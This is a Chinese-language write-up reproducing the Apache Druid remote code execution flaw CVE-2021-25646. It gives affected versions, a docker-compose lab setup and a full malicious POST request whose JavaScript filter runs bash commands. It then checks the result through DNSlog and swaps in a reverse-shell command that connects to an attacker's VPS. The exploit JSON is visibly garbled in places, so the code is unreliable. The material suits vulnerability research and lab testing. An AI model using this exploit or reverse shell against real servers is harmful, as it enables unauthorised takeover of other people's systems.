2023年6月27日发(作者：)

ApacheDruidRCE（CVE-2021-25646）复现附漏洞检测POC⽬录漏洞简介Apache Druid：Apache Druid是⼀个专为⼤数据集的快速切⽚分析（查询）⽽设计的实时分析数据库。Druid作为数据库，最常⽤于⽀持以下⽤例：实时摄取、快速查询和⾼运⾏时长。例如，Druid⼀般⽤于⽀持分析型应⽤程序的GUI，或是需要快速聚合的⾼并发API后台。Druid最适合⽤于⾯向事件的数据。Druid常见的应⽤领域包括：点击流分析（Web和移动分析）⽹络遥测分析（⽹络性能监视器）服务器指标存储供应链分析（制造指标）应⽤程序性能指标数字市场营销/⼴告分析商业智能/OLAPApache Druid包括执⾏⽤户提供的JavaScript的功能嵌⼊在各种类型请求中的代码。此功能在⽤于⾼信任度环境中，默认已被禁⽤。但是，在Druid 0.20.0及更低版本中，经过⾝份验证的⽤户发送恶意请求，利⽤Apache Druid漏洞可以执⾏任意代码。攻击者可直接构造恶意请求执⾏任意代码，控制服务器。

影响版本Apache Druid < 0.20.1docker-compose⼀键搭建漏洞环境漏洞测试环境版本：Apache Druid ⽂件内容如下version: '2'services: web: image: fokkodriesprong/docker-druid ports: - "8888:8888"执⾏docker-compose up -d启动漏洞环境，可能启动的⽐较慢，需要两三分钟后才能访问成功启动后界⾯如下 漏洞复现1. ⽤DNSlog探测远程命令执⾏1. 在⾸页截取数据请求包，将以下数据包代替请求包POST /druid/indexer/v1/sampler?for=filter HTTP/1.1Host: 你的ip和端⼝User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 679Connection: close{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":".g"function":"function(value){return time().exec('/bin/bash -c $@|bash 0 ping ')}","dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}2. 发送数据包，刷新dnslog，如下说明漏洞存在2. 反弹shell将post数据中的 'ping dnslog'修改为反弹shell的语句：echo bash -i >&/dev/tcp/vps ip地址/监听端⼝ 0>&1查看监听，反弹shell成功

漏洞检测POC——⼼，若没有栖息的地⽅，到哪都是流浪